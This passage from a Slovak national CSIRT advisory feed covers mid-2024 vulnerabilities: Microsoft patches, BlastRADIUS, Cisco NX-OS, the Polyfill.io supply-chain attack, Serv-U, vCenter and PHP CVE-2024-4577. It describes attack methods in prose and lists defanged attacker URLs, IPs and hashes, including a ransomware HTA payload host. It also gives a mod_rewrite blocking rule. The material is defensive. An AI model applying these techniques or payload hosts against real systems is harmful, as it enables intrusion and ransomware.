Microsoft .NET Framework 3.0 Service Pack 2
Microsoft .NET Framework 3.5
Microsoft .NET Framework 3.5 AND 4.7.2
Microsoft .NET Framework 3.5 AND 4.8
Microsoft .NET Framework 3.5 AND 4.8.1
Microsoft .NET Framework 3.5.1
Microsoft .NET Framework 4.6.2
Microsoft .NET Framework 4.6.2/4.7/4.7.1/4.7.2
Microsoft .NET Framework 4.6/4.6.2
Microsoft .NET Framework 4.8
Microsoft 365 Apps for Enterprise for 32-bit Systems
Microsoft 365 Apps for Enterprise for 64-bit Systems
Microsoft Defender for IoT
Microsoft Dynamics 365 (on-premises) version 9.1
Microsoft OLE DB Driver 18 for SQL Server
Microsoft OLE DB Driver 19 for SQL Server
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
Microsoft Office 2019 for 32-bit editions
Microsoft Office 2019 for 64-bit editions
Microsoft Office LTSC 2021 for 32-bit editions
Microsoft Office LTSC 2021 for 64-bit editions
Microsoft Outlook 2016 (32-bit edition)
Microsoft Outlook 2016 (64-bit edition)
Microsoft SQL Server 2016 for x64-based Systems Service Pack 3 (GDR)
Microsoft SQL Server 2016 for x64-based Systems Service Pack 3 Azure Connect Feature Pack
Microsoft SQL Server 2017 for x64-based Systems (CU 31)
Microsoft SQL Server 2017 for x64-based Systems (GDR)
Microsoft SQL Server 2019 for x64-based Systems (CU 27)
Microsoft SQL Server 2019 for x64-based Systems (GDR)
Microsoft SQL Server 2022 for x64-based Systems (CU 13)
Microsoft SQL Server 2022 for x64-based Systems (GDR)
Microsoft SharePoint Enterprise Server 2016
Microsoft SharePoint Server 2019
Microsoft SharePoint Server Subscription Edition
Microsoft Visual Studio 2022 version 17.10
Microsoft Visual Studio 2022 version 17.4
Microsoft Visual Studio 2022 version 17.6
Microsoft Visual Studio 2022 version 17.8
Windows 10 Version 1607 for 32-bit Systems
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 11 Version 23H2 for x64-based Systems
Windows 11 version 21H2 for ARM64-based Systems
Windows 11 version 21H2 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows Server 2022 (Server Core installation)
Windows Server 2022, 23H2 Edition (Server Core installation)

Opis činnosti:

Spoločnosť Microsoft opravila v rámci svojho pravidelného balíka aktualizácií Patch Tuesday 139 zraniteľností, z toho je 5 je označených ako kritické a 4 ako zero-day. Najzávažnejšie zraniteľnosti možno zneužiť na vzdialené vykonanie kódu, eskaláciu privilégií, obídenie bezpečnostných prvkov, získanie neoprávneného prístupu k citlivým údajom, či zneprístupnenie služby. Zero-day zraniteľnosti s označením CVE-2024-38080 a CVE-2024-38112 sú aktívne zneužívané útočníkmi.

Kritické zraniteľnosti:

CVE-2024-38074, CVE-2024-38076, CVE-2024-38077 (CVSS skóre 9,8)

Kritické zraniteľnosti v komponente Windows Remote Desktop Licencing Service spočívajú v podtečení celočíselnej premennej (CVE-2024-38074) a pretečení medzipamäte haldy (CVE-2024-38076, CVE-2024-38077). Vzdialený neautentifikovaný útočník by ich prostredníctvom zaslania špeciálne vytvorených paketov alebo správ mohol zneužiť na vykonanie škodlivého kódu.

CVE-2024-38060 (CVSS skóre 8,8)

Komponent Windows Imaging Component obsahuje zraniteľnosť, ktorá umožňuje vzdialené vykonanie škodlivého kódu. Úspešné zneužitie zraniteľnosti vyžaduje, aby autentifikovaný útočník nahral škodlivý TIFF súbor na zraniteľný server.

CVE-2024-38023 (CVSS skóre 7,2)

Zraniteľnosť v produkte Microsoft SharePoint Server umožňuje vzdialenému autentifikovanému útočníkovi s oprávneniami úrovne „Site Owner“ alebo vyššie vykonať škodlivý kód v kontexte SharePoint servera. Zraniteľnosť je možné zneužiť nahraním špeciálne vytvoreného súboru a následným zaslaním špeciálne vytvorenej API požiadavky, ktorá vedie k deserializácii parametrov tohto súboru.

Zero-day zraniteľnosti:

CVE-2024-38080 (CVSS skóre 7,8)

Zraniteľnosť v komponente Hyper-V spočíva v pretečení celočíselnej premennej a vzdialený autentifikovaný útočník by ju mohol zneužiť na eskaláciu privilégií na úroveň používateľa SYSTEM. Zraniteľnosť je v súčasnosti aktívne zneužívaná útočníkmi.

CVE-2024-38112 (CVSS skóre 7,5)

Komponent MSHTML Platform obsahuje aktívne zneužívanú zraniteľnosť, ktorú možno zneužiť na vykonanie bližšie nešpecifikovaných spoofing útokov. Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa, ktorý musí spustiť škodlivý súbor vytvorený útočníkom.

CVE-2024-35264 (CVSS skóre 8,1)

CVE-2024-35264 v produktoch .NET a Visual Studio Code spočíva v použití odalokovaného miesta v pamäti, ktoré možno zneužiť na vzdialené vykonanie kódu. Pre úspešné zneužitie zraniteľnosti musí útočník vyhrať súbeh procesov, čo môže docieliť prerušením http/3 streamu počas prebiehajúceho spracovávania tela požiadavky.

CVE-2024-37985 (CVSS skóre 5,9)

Windows 11 verzie 23H2 a 22H2 pre platformu ARM obsahujú zraniteľnosť, ktorú by lokálny neautentifikovaný útočník mohol zneužiť na získanie neoprávneného prístupu k obsahu haldy privilegovaného procesu bežiaceho na serveri.

Možné škody:

Vzdialené vykonanie kódu
Eskalácia privilégií
Neoprávnený prístup k citlivým údajom
Zneprístupnenie služby
Obídenie bezpečnostného prvku

Odporúčania:

Bezodkladné nasadenie júlového balíka opráv na zraniteľné produkty spoločnosti Microsoft nájdete tu.

Zdroje:

https://msrc.microsoft.com/update-guide/releaseNote/2024-Jul

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38023

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38060

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38074

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38076

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38077

https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-38080

https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-38112

https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-35264

https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-37985

Kritická zraniteľnosť protokolu RADIUS

Marian Danko — Wed, 10 Jul 2024 13:36:14 +0000

Tím výskumníkov popísal útok na protokol RADIUS, ktorým môže útočník pomocou manipulácie prefixu paketu a vytvorením kolízie MD5 pre premennú v ňom zakomponovanú získať povolenie na prístup do administrátorského rozhrania sieťového zariadenia. Útočník nepotrebuje poznať heslo ani zdieľané tajomstvá.

Zraniteľné systémy:

zariadenia a systémy využívajúce protokol RADIUS bez dodatočného zabezpečenia

Opis činnosti:

CVE-2024-3596 (CVSS v3 skóre 7,5)

Výskumníci z viacerých univerzít a spoločností a spoločnosť InkBridge Networks zverejnili informáciu o útoku na protokol RADIUS, ktorým dokázali obísť autentifikáciu používateľa. Nazvali ho BlastRADIUS. Protokol slúži už tridsať rokov pre bezpečné riadenie prístupov do sietí a sieťových zariadení (vrátane VPN, Wifi a mobilných sietí).

Chyba, ktorú útok zneužíva, spočíva v dizajne paketov Access-Request, ktorým chýba kontrola integrity a nie sú autentifikované. Paket s odpoveďou obsahuje hodnotu Response Authenticator, ktorá slúži na overenie integrity odpovede servera. Na jej výpočet však protokol využíva slabú hašovaciu funkcie MD5.

Útočník tak môže pomocou útoku MitM medzi klientom a serverom a útokom „chosen-prefix collision“ na MD5 aj pri zamietnutí pripojenia (Access-Reject) vytvoriť falošný paket Access-Accept so správnou hodnotou Response Authenticator. Výskumníci na to využili manipuláciu atribútu Proxy-State, ktorý vstupuje do výpočtu Response Authenticator, čím vytvorili kolíziu hašov MD5, t.j. získali platnú hodnotu Response Authenticator. Získanú hodnotu potom úspešne použili vo falošnom pakete Access-Accept.

Útočník teda nemusí poznať heslo používateľa, ani zdieľané tajomstvá, aby prenikol napríklad do administrátorského rozhrania sieťového zariadenia.

Závažnosť zraniteľnosti: Vysoká

Možné škody:

Obídenie bezpečnostných prvkov
Kompromitácia siete

Odporúčania:

Odporúčame bezodkladnú aktualizáciu firmvéru sieťových prvkov a zariadení, ktoré využívajú protokol RADIUS.

Zraniteľnosť je možné mitigovať vynútením používania atribútu Message-Authenticator pre všetky požiadavky a odpovede pre klientov aj servery. Odpovede Access-Accept a Access-Reject by mali mať tento atribút na prvom mieste.

Bližšie informácie nájdete tu.

Odkazy:

https://www.inkbridgenetworks.com/blastradius

https://www.blastradius.fail/

https://www.securityweek.com/blastradius-attack-exposes-critical-flaw-in-30-year-old-radius-protocol/

https://www.bleepingcomputer.com/news/security/new-blast-radius-attack-bypasses-widely-used-radius-authentication/

https://www.tenable.com/cve/CVE-2024-3596

https://blog.cloudflare.com/radius-udp-vulnerable-md5-attack

https://kb.cert.org/vuls/id/456537

https://datatracker.ietf.org/doc/draft-ietf-radext-deprecating-radius/

Ako nahlasovať podozrivé e-maily

Marian Danko — Tue, 09 Jul 2024 11:47:56 +0000

Pripravili sme pre vás návod, ako môžete jednoducho stiahnuť podozrivý e-mail, ktorý nám chcete poslať pre analýzu v rámci hlásenia kybernetického bezpečnostného incidentu.

Ako nahlasovať podozrivé e-maily (07-2024)

Viac návodov a odporúčaní nájdete tu.

Mesačný prehľad kritických zraniteľností jún 2024

Marian Danko — Tue, 09 Jul 2024 11:35:25 +0000

Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci jún 2024.

Mesačný prehľad – 06/2024 PDF (285 KB)

Prehľady sú spracovávané od októbra 2014 a sú dostupné na tomto odkaze.

Sociálne siete [Infografika]

Marian Danko — Wed, 03 Jul 2024 12:39:58 +0000

Pripravili sme si pre Vás infografiku o bezpečnosti na sociálnych sieťach. S akými najbežnejšími, aktuálnymi formami útokov sa na nich môžete stretnúť? Ako ich identifikovať podvodníkov, predátorov, falošný a škodlivý obsah a ako chrániť seba a svoje citlivé informácie?

Aktívne zneužívaná zero-day zraniteľnosť v prepínačoch CISCO NEXUS a MDS

Marian Danko — Wed, 03 Jul 2024 12:27:55 +0000

Spoločnosť CISCO vydala bezpečnostné aktualizácie na sieťové prepínače série NEXUS a MDS, ktoré opravujú aktívne zneužívanú zero-day zraniteľnosť umožňujúcu vykonanie škodlivého kódu. Napriek tomu, že zneužitie zraniteľnosti vyžaduje administrátorský prístup k zraniteľnému zariadeniu, CISCO a bezpečnostní výskumníci zo spoločnosti SYGNIA evidujú prípady jej úspešného zneužitia zo strany čínskej skupiny VELVET ANT.

Zraniteľné systémy:

Prepínače série CISCO Nexus 3000
Prepínače série CISCO Nexus 5500
Prepínače série CISCO Nexus 5600
Prepínače série CISCO Nexus 6000
Prepínače série CISCO Nexus 7000
Prepínače série CISCO Nexus 9000 v standalone NX-OS režime
Prepínače série CISCO MDS 9000

Pozn. Presnú špecifikáciu zasiahnutých produktov môžete nájsť na stránke výrobcu.

Opis zraniteľnosti:

CVE-2024-20399 (CVSS skóre 6.0)

Zero-day zraniteľnosť operačného systému NX-OS spočíva v nedostatočnom overovaní argumentov v rámci príkazového riadka CLI. Lokálny autentifikovaný útočník s administrátorským prístupom by ju prostredníctvom injekcie príkazov mohol zneužiť na vykonanie škodlivého kódu s oprávneniami používateľa root. Zraniteľnosť je aktívne zneužívaná čínskou skupinou VELVET ANT na inštaláciu bližšie nešpecifikovaného malvéru, ktorý umožňuje vzdialený prístup, uploadovanie súborov a vykonanie škodlivého kódu.

Možné škody:

Vykonanie škodlivého kódu

Odporúčania:

Administrátorom a používateľom odporúčame vykonať bezodkladnú aktualizáciu zasiahnutých systémov.

Zdroje:

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-cmd-injection-xD9OhyOP

https://www.sygnia.co/threat-reports-and-advisories/china-nexus-threat-group-velvet-ant-exploits-cisco-0-day/

https://thehackernews.com/2024/07/chinese-hackers-exploiting-cisco.html

Polyfill – z bežnej webovej knižnice malvér

Marian Danko — Wed, 03 Jul 2024 12:26:27 +0000

Po odkúpení služby Polyfill.io, ktorá poskytuje knižnicu pre webové aplikácie polyfill.js, sa zistilo, že nový majiteľ upravil funkcionalitu skriptu tak, aby presmerovával požívateľov na škodlivé webstránky. Odporúčame prestať danú knižnicu používať, alebo nahradiť jej zdroj dôveryhodným zdrojom.

Zraniteľné systémy:

Polyfill.js (Polyfill.io, Polyfill.com, … vlastnené spoločnosťou Funnull)

Opis zraniteľnosti:

Čínska firma Funnull kúpila vo februári doménu služby Polyfill.io, ktorá poskytuje knižnicu polyfill.js, spolu s účtom na platforme Github. Uvedená JavaScriptová knižnica poskytuje podporu niektorých funkcionalít webových prehliadačov. Krátko po odkúpení začala knižnica presmerovávať používateľov na škodlivé webové stránky. Spoločnosť totiž knižnicu upravila.

Škodlivá funkcionalita presmerovávala používateľov na určitých mobilných zariadeniach v určitých časoch na stránky spojené so stávkovaním a s pornografickým obsahom. Pokiaľ detegovala administrátorské oprávnenia, presmerovanie sa nespustilo.

Knižnicu v súčasnosti využíva vyše 110 000 webstránok. Podľa vyjadrenia zakladateľa projektu Andrewa Bettsa knižnica už v dnešnej dobe nie je potrebná, pretože prehliadače jej funkcionality implementujú priamo vo svojom kóde.

Možné škody:

Presmerovanie na škodlivé webstránky

Odporúčania:

Vývojári polyfill.js odporúčajú bezodkladne odstrániť túto knižnicu z Vašich webových aplikácií. Pokiaľ potrebujete využívať jej funkcionality, môžete ju nahradiť dôveryhodnými zdrojmi polyfill.js od Fastly alebo Cloudflare.

Zabezpečte sa voči útokom na knižnice JS tretích strán:

Monitorujte nezvyčajnú aktivitu služieb tretích strán
Implementujte Content Security Policy (CSP), čím obmedzíte zdroje, odkiaľ môžu Vaše služby načítavať knižnice a skripty
Implementujte Subresource Integrity (SRI), čím zabezpečíte, že skripty tretích strán neboli pozmenené
Manažujte závislosti, obmedzte ich na nutné minimum a pravidelne ich aktualizujte

Indikátory kompromitácie:

hXXps://kuurza.com/redirect?from=bitget
hXXps://www.googie-anaiytics.com/html/checkcachehw.js
hXXps://www.googie-anaiytics.com/ga.js
hXXps://cdn.bootcss.com/highlight.js/9.7.0/highlight.min.js
hXXps://union.macoms.la/jquery.min-4.0.2.js
hXXps://newcrbpc.com/redirect?from=bscbc
bootcdn[.]net
staticfile[.]net
staticfile[.]org
unionadjs[.]com
xhsbpza[.]com

Zdroje:

https://sansec.io/research/polyfill-supply-chain-attack

https://thehackernews.com/2024/06/over-110000-websites-affected-by.html

https://www.sonatype.com/blog/polyfill.io-supply-chain-attack-hits-100000-websites-all-you-need-to-know

https://blog.cloudflare.com/automatically-replacing-polyfill-io-links-with-cloudflares-mirror-for-a-safer-internet

https://polykill.io/

https://www.bleepingcomputer.com/news/security/polyfillio-bootcdn-bootcss-staticfile-attack-traced-to-1-operator/

Službu Achilles rozširujeme o monitoring dostupnosti (Domino)

Marian Danko — Tue, 25 Jun 2024 13:14:22 +0000

V rámci projektu Achilles poskytuje CSIRT.SK aj možnosť pravidelného overovania dostupnosti aktív danej organizácie, napr. webových serverov a služieb, prostredníctvom systému Domino. Cieľom je detekcia pokusu o útok typu odoprenie služby (angl. Denial of Service, skr. DoS), pomocou ktorej vieme informovať prevádzkovateľa danej webovej služby o jej nedostupnosti.

Z toho dôvodu je možné, že na daných infraštruktúrach budú evidované frekventované požiadavky typu GET (protokol HTTPS), pochádzajúce z IP adries CSIRT.SK, ktoré sa opakujú v pravidelných intervaloch.

V prípade, že by ste mali záujem pridať (príp. odobrať) aktíva v rámci tejto služby, kontaktujte nás cez e-mail na adrese achilles@csirt.sk. Do tela e-mailu taktiež napíšte domény, o ktoré sa jedná.

Príklad:

” Predmet: DOMINO – ZMENA ZOZNAMU AKTÍV

Touto cestou by som Vás chcel požiadať o zrušenie overovania dostupnosti pre nasledujúce aktíva:

test.csirt.sk

ddos.csirt.sk”

Aktívne zneužívaná zraniteľnosť umožňuje získanie obsahu súborov zo SolarWinds Serv-U

Marian Danko — Tue, 25 Jun 2024 07:54:51 +0000

Spoločnosť SolarWinds vydala bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú zraniteľnosť v platforme na prenos súborov Serv-U. Zraniteľnosť umožňujúcu prechádzanie adresárov možno zneužiť na čítanie obsahu súborov na hostiteľskom systéme.

Zraniteľné systémy:

SolarWinds Serv-U vo verziách starších ako 15.4.2 HF 2

Opis činnosti:

CVE-2024-28995 (CVSS skóre 8,6)

Aktívne zneužívaná zraniteľnosť umožňuje prechádzanie obsahu adresárov a vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených HTTP GET požiadaviek mohol zneužiť na získanie neoprávneného prístupu ku všetkým súborom na súborovom systéme, vrátane súborov obsahujúcich prihlasovacie údaje, certifikáty a ďalších súborov s citlivými údajmi. V súčasnosti je verejne dostupný nástroj na vyhľadávanie zraniteľných systémov a proof-of-concept kód demonštrujúci návod na jej zneužitie.

Možné škody:

Neoprávnený prístup k citlivým údajom

Odporúčania:

Výrobca odporúča bezodkladnú aktualizáciu zraniteľných produktov na verziu 15.4.2 HF2. Vzhľadom na to, že inštalácia tejto aktualizácie vyžaduje verziu 15.4.2 HF1, postupujte podľa návodu na stránke výrobcu.

Zdroje:

https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28995

https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-15-4-2-Hotfix-2-Release-Notes

https://www.labs.greynoise.io/grimoire/2024-06-solarwinds-serv-u/

https://www.rapid7.com/blog/post/2024/06/11/etr-cve-2024-28995-trivially-exploitable-information-disclosure-vulnerability-in-solarwinds-serv-u/

https://thehackernews.com/2024/06/solarwinds-serv-u-vulnerability-under.html

Kritické bezpečnostné zraniteľnosti vo VMware vCenter Server

Marian Danko — Fri, 21 Jun 2024 11:43:50 +0000

Spoločnosť BROADCOM vydala bezpečnostné aktualizácie, ktoré opravujú 3 bezpečnostné zraniteľnosti v produkte VMware vCenter Server. Z nich 2 sú označené ako kritické. Zraniteľnosti možno zneužiť na eskaláciu privilégií a vzdialené vykonanie kódu.

Zraniteľné systémy:

· VMware vCenter Server vo verzii 7.0

· VMware vCenter Server vo verzii 8.0

Poznámka: vCenter Server je tiež súčasťou produktov VMware vSphere a VMware Cloud Foundation

Opis činnosti:

CVE-2024-37079, CVE-2024-37080 (CVSS skóre 9.8)

Chyby pretečenia haldy v implementácii protokolu DCE/RPC by vzdialený neautentifikovaný útočník mohol zneužiť na vykonanie škodlivého kódu. Zraniteľnosť možno zneužiť odoslaním špeciálne vytvoreného paketu.

CVE-2024-37081 (CVSS skóre 7.8)

Zraniteľnosť spočíva v nesprávnej konfigurácii sudo a lokálny autentifikovaný útočník bez administrátorských oprávnení by ju mohol zneužiť na eskaláciu privilégií na úroveň používateľa „root“.

Možné škody:

· Eskalácia privilégií

· Vzdialené vykonávanie kódu

Odporúčania:

Bezodkladná aktualizácia VMware vCenter Server na verzie 7.0 U3r, 8.0 U2d alebo 8.0 U1e. Keďže je vCenter Server súčasťou VMware Cloud Foundation, výrobca odporúča aj inštaláciu aktualizácií KB88287.

Zdroje:

https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24453

https://core.vmware.com/resource/vmsa-2024-0012-questions-answers#introduction

https://thehackernews.com/2024/06/vmware-issues-patches-for-cloud.html

Kritická zraniteľnosť PHP zneužívaná na šírenie ransomvéru

Marian Danko — Fri, 14 Jun 2024 11:03:14 +0000

Vývojári skriptovacieho jazyka PHP vydali bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť. Chyba súvisí s konverziou kódovania znakov cez funkciu Windows Best-Fit a prostredníctvom injekcie príkazov ju možno zneužiť na vzdialené vykonanie kódu. Zraniteľnosť je v súčasnosti aktívne zneužívaná na šírenie ransomvéru TellYouThePass.

Zraniteľné systémy:

PHP pre Windows, všetky verzie od 5.X

Opis činnosti:

CVE-2024-4577 (CVSS v3.1 skóre 9,8)

Kritická zraniteľnosť jazyka PHP, ktorá umožňuje vzdialené vykonávanie kódu na zraniteľných PHP serveroch injektovaním premenných. Chyba súvisí s konverziou kódovania znakov cez funkciu Best-Fit pre Windows, ktorá môže konvertovať znaky vo funkciách Win32 API. PHP modul CGI môže tento výstup interpretovať ako premenné, resp. príkazy PHP.

Pokiaľ PHP nie je v CGI móde, zraniteľnosť môžu útočníci zneužiť v prípade, že súbory php.exe a php-cgi.exe sa nachádzajú v priečinkoch prístupných pre webový server (prednastavená konfigurácia napríklad pre XAMPP).

Zraniteľnosť objavil Orange Tsai, výskumník spoločnosti Devcore.

Zneužitie zraniteľnosti pri ransomvérových útokoch

Útočníci zraniteľnosť zneužívajú prostredníctvom zaslania špeciálne vytvorenej požiadavky HTTP POST na vykonanie obsahu škodlivého HTA súboru na webovom serveri útočníka prostredníctvom mshta.exe (natívna aplikácia MS Windows). HTA obsahuje kód VBScript slúžiaci na dekódovanie sekvencie bajtov, ktorá je počas behu skriptu nahratá priamo do operačnej pamäte zraniteľných systémov. Analýza spoločnosti IMPERVA ukázala, že sa jedná o .NET variant ransomvéru TellYouThePass. Táto rodina ransomvéru je aktívna už od roku 2019.

Závažnosť zraniteľnosti: Kritická

Možné škody:

Vzdialené vykonávanie kódu

Odporúčania:

Výrobca odporúča používať len verzie PHP, ktoré majú technickú podporu a zasiahnuté systémy bezodkladne aktualizovať na najnovšie verzie: 8.3.8, 8.2.20 alebo 8.1.29.

Ak nie je možná aktualizácia, zraniteľnosť je možné mitigovať nasledujúcim pravidlom mod_rewrite, ako napríklad:

RewriteEngine On

RewriteCond %{QUERY_STRING} ^%ad [NC]

RewriteRule .? – [F,L]

Ak používate platformu XAMPP, mitigovať zraniteľnosť môžete zakomentovaním riadku „ScriptAlias“ v konfiguračnom súbore Apache.

Vzhľadom na aktívne zneužívanie zraniteľnosti odporúčame dôkladne preveriť prítomnosť dostupných indikátorov kompromitácie (IOC) v logoch sieťových a bezpečnostných prvkov.

Indikátory kompromitácie (IOC):

SHA256 hashe súborov:

95279881525d4ed4ce25777bb967ab87659e7f72235b76f9530456b48a00bac3 (HTA)
5a2b9ddddea96f21d905036761ab27627bd6db4f5973b006f1e39d4acb04a618 (HTA)
9562AD2C173B107A2BAA7A4986825B52E881A935DEB4356BF8B80B1EC6D41C53 (.NET malvér)

IP adresy:

18.141.81 [.]39

45.130.22 [.]219

59.31.203 [.]57

61.160.194 [.]160

88.218.76[.]13

93.95.228 [.]70

107.175.127[.]195

120.77.82 [.]232

URL:

hxxp:/88.218.76[.]13/dd3.hta
hxxp://107.175.127[.]195/

Odkazy:

https://www.bleepingcomputer.com/news/security/php-fixes-critical-rce-flaw-impacting-all-versions-for-windows/

https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/

https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/

https://nvd.nist.gov/vuln/detail/CVE-2024-4577

https://www.imperva.com/blog/update-cve-2024-4577-quickly-weaponized-to-distribute-tellyouthepass-ransomware/

https://cert.360.cn/report/detail?id=65fceeb4c09f255b91b17f11

https://www.sangfor.com/farsight-labs-threat-intelligence/cybersecurity/new-tellyouthepass-ransomware-variant-discovered

Microsoft v rámci júnového Patch Tuesday opravil kritickú zraniteľnosť v MSMQ

Marian Danko — Fri, 14 Jun 2024 06:08:40 +0000

Spoločnosť Microsoft vydala v júni 2024 balík opráv pre portfólio svojich produktov opravujúci 51 zraniteľností, z ktorých 18 umožňuje vzdialené vykonávanie kódu. Kritická bezpečnostná zraniteľnosť sa nachádza v produkte Microsoft Message Queuing.

Zraniteľné systémy:

Azure Data Science Virtual Machines for Linux
Azure File Sync v16.0
Azure File Sync v17.0
Azure File Sync v18.0
Azure Identity Library for .NET
Azure Identity Library for C++
Azure Identity Library for Go
Azure Identity Library for Java
Azure Identity Library for JavaScript
Azure Identity Library for Python
Azure Monitor Agent
Azure Storage Movement Client Library for .NET
Microsoft 365 Apps for Enterprise for 32-bit Systems
Microsoft 365 Apps for Enterprise for 64-bit Systems
Microsoft Authentication Library (MSAL) for .NET
Microsoft Authentication Library (MSAL) for Java
Microsoft Authentication Library (MSAL) for Node.js
Microsoft Dynamics 365 (on-premises) version 9.1
Microsoft Dynamics 365 Business Central 2023 Release Wave 1
Microsoft Dynamics 365 Business Central 2023 Release Wave 2
Microsoft Dynamics 365 Business Central 2024 Release Wave 1
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
Microsoft Office 2019 for 32-bit editions
Microsoft Office 2019 for 64-bit editions
Microsoft Office LTSC 2021 for 32-bit editions
Microsoft Office LTSC 2021 for 64-bit editions
Microsoft Outlook 2016 (32-bit edition)
Microsoft Outlook 2016 (64-bit edition)
Microsoft SharePoint Enterprise Server 2016
Microsoft SharePoint Server 2019
Microsoft SharePoint Server Subscription Edition
Microsoft Visual Studio 2017 version 15.9 (includes 15.0 – 15.8)
Microsoft Visual Studio 2019 version 16.11 (includes 16.0 – 16.10)
Microsoft Visual Studio 2022 version 17.10
Microsoft Visual Studio 2022 version 17.4
Microsoft Visual Studio 2022 version 17.6
Microsoft Visual Studio 2022 version 17.8
Windows 10 Version 1607 for 32-bit Systems
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 11 Version 23H2 for x64-based Systems
Windows 11 version 21H2 for ARM64-based Systems
Windows 11 version 21H2 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows Server 2022 (Server Core installation)
Windows Server 2022, 23H2 Edition (Server Core installation)

Opis činnosti:

Spoločnosť Microsoft opravila v rámci svojho pravidelného balíka aktualizácií Patch Tuesday 51 zraniteľností, z toho je 1 je označená ako kritická. Najzávažnejšie zraniteľnosti umožňujú vzdialené vykonanie kódu, eskaláciu privilégií, získanie neoprávneného prístupu k citlivým údajom, či zneprístupnenie služby. Zraniteľnosti zatiaľ nie sú aktívne zneužívané.

CVE-2024-30080 (CVSS skóre 9,8)

Kritická zraniteľnosť v produkte Microsoft Message Queuing (MSMQ) spočíva vo využití odalokovaného miesta v pamäti a umožňuje vzdialenému neautentifikovanému útočníkovi vykonanie škodlivého kódu na MSMQ serveri. Zraniteľnosť je možné zneužiť zaslaním špeciálne vytvoreného MSMQ paketu. Nakoľko sa jedná o voliteľnú súčasť operačných systémov Windows, zraniteľnosť možno zneužiť len na systémoch, kde je aktivovaná.

CVE-2024-30103 (CVSS skóre 8,8)

Zraniteľnosť v Microsoft Outlook umožňuje obídenie blacklist v registroch Outlook a vzdialený autentifikovaný útočník by ju mohol zneužiť na vykonanie škodlivého kódu na úrovni použivateľských oprávnení obete. Jedná sa o tzv. zero-click zraniteľnosť, ktorá nevyžaduje priamo interakciu s obsahom e-mailu a k jej zneužitiu dochádza pri otvorení e-mailu. Bezpečnostní výskumníci plánujú v auguste zverejniť aj proof-of-concept kód demonštrujúci návod na zneužitie zraniteľnosti.

Možné škody:

Vzdialené vykonanie kódu
Eskalácia privilégií
Neoprávnený prístup k citlivým údajom
Zneprístupnenie služby

Odporúčania:

Bezodkladné nasadenie júnového balíka opráv na zraniteľné produkty spoločnosti Microsoft, ku ktorým aktualizácie nájdete tu.

Zdroje:

https://msrc.microsoft.com/update-guide/releaseNote/2024-Jun

https://thehackernews.com/2024/06/microsoft-issues-patches-for-51-flaws.html

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30080

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30103

https://blog.morphisec.com/cve-2024-30103-microsoft-outlook-vulnerability

Mesačná správa CSIRT.SK – máj 2024

